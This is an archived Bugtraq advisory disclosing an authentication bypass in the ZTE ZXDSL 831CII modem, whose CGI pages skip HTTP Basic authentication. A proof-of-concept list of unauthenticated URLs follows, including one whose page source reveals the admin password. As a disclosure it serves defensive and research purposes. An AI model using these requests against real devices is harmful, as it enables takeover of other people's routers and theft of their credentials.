[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

ZTE ZXDSL 831CII Direct Object Reference

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: ZTE ZXDSL 831CII Direct Object Reference
From: habte.yibelo@xxxxxxxxx
Date: Thu, 6 Nov 2014 19:28:53 GMT

The modem usually serves html files & protects them with HTTP Basic 
authentication. however, the cgi files, does not get this protection. so simply 
requesting any cgi file (without no authentication) would give a remote 
attacker full access to the modem and then can easily be used to root the modem 
and disrupt network activities. 

So requesting modem.ip.address would result HTTP Authentication request, but 
simply requesting http://192.168.1.1/main.cgi will bypass it.

PoC: http://192.168.1.1/adminpasswd.cgi (will result admin password change 
page) - viewing the source will show the current password (unencrypted)
http://192.168.1.1/userpasswd.cgi
http://192.168.1.1/upload.cgi
http://192.168.1.1/conprocess.cgi
http://192.168.1.1/connect.cgi

Prev by Date: CA20141103-01: Security Notice for CA Cloud Service Management
Next by Date: ZTE 831CII Multiple Vulnerablities
Previous by thread: CA20141103-01: Security Notice for CA Cloud Service Management
Next by thread: ZTE 831CII Multiple Vulnerablities
Index(es):
- Date
- Thread